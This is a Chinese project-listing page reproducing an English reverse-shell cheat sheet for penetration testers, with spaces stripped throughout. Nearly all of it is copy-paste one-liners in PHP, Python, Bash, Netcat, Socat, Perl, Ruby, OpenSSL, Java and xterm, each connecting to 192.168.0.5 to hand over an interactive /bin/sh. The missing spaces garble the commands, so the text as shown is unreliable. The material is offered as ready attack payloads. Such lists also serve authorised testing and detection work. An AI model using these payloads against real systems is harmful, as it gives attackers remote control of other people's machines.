reverse-shell-cheatsheet开源项目

我要开发同款
匿名用户2021年11月09日
50阅读
开发技术SHELL
所属分类终端/远程登录、应用工具
授权协议MIT License

作品详情

ReverseShellCheatSheet

Ifyou’reluckyenoughtofindacommandexecutionvulnerabilityduringapenetrationtest,prettysoonafterwardsyou’llprobablywantaninteractiveshell.

Ifit’snotpossibletoaddanewaccount/SSHkey/.rhostsfileandjustlogin,yournextstepislikelytobeeithertrowingbackareverseshellorbindingashelltoaTCPport.Thispagedealswiththeformer.

Youroptionsforcreatingareverseshellarelimitedbythescriptinglanguagesinstalledonthetargetsystem–thoughyoucouldprobablyuploadabinaryprogramtooifyou’resuitablywellprepared.

TheexamplesshownaretailoredtoUnix-likesystems.SomeoftheexamplesbelowshouldalsoworkonWindowsifyouusesubstitute“/bin/sh-i”with“cmd.exe”.

Eachofthemethodsbelowisaimedtobeaone-linerthatyoucancopy/paste.Assuchthey’requiteshortlines,butnotveryreadable.

Php:php-r'$sock=fsockopen("192.168.0.5",4444);exec("/bin/sh-i<&3>&32>&3");'Python:python-c'importsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'Bash:bash-i>&/dev/tcp/192.168.0.1/80800>&1Netcat:nc-e/bin/sh192.168.0.54444Socat:socattcp-connect:192.168.0.5:4444system:/bin/shPerl:perl-e'useSocket;$i="192.168.0.5";$p=4545;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh-i");};'Ruby:ruby-rsocket-e'f=TCPSocket.open("192.168.0.5",4444).to_i;execsprintf("/bin/sh-i<&%d>&%d2>&%d",f,f,f)'OpenSSL:

Onyourmachine(toreceive,notanormalTCPconnection)

opensslreq-x509-newkeyrsa:4096-keyoutkey.pem-outcert.pem-days365-nodes#generatesomearbitrarycertopenssls_server-quiet-keykey.pem-certcert.pem-port4444

OnPWN'dclient

mkfifo/tmp/s;/bin/sh-i</tmp/s2>&1|openssls_client-quiet-connect192.168.0.5:4444>/tmp/s;rm/tmp/sJava:r=Runtime.getRuntime()p=r.exec(["/bin/bash","-c","exec5<>/dev/tcp/192.168.0.5/4444;cat<&5|whilereadline;do\$line2>&5>&5;done"]asString[])p.waitFor()xterm:xterm-display192.168.0.5:4444
声明:本文仅代表作者观点,不代表本站立场。如果侵犯到您的合法权益,请联系我们删除侵权资源!如果遇到资源链接失效,请您通过评论或工单的方式通知管理员。未经允许,不得转载,本站所有资源文章禁止商业使用运营!
下载安装【程序员客栈】APP
实时对接需求、及时收发消息、丰富的开放项目需求、随时随地查看项目状态

评论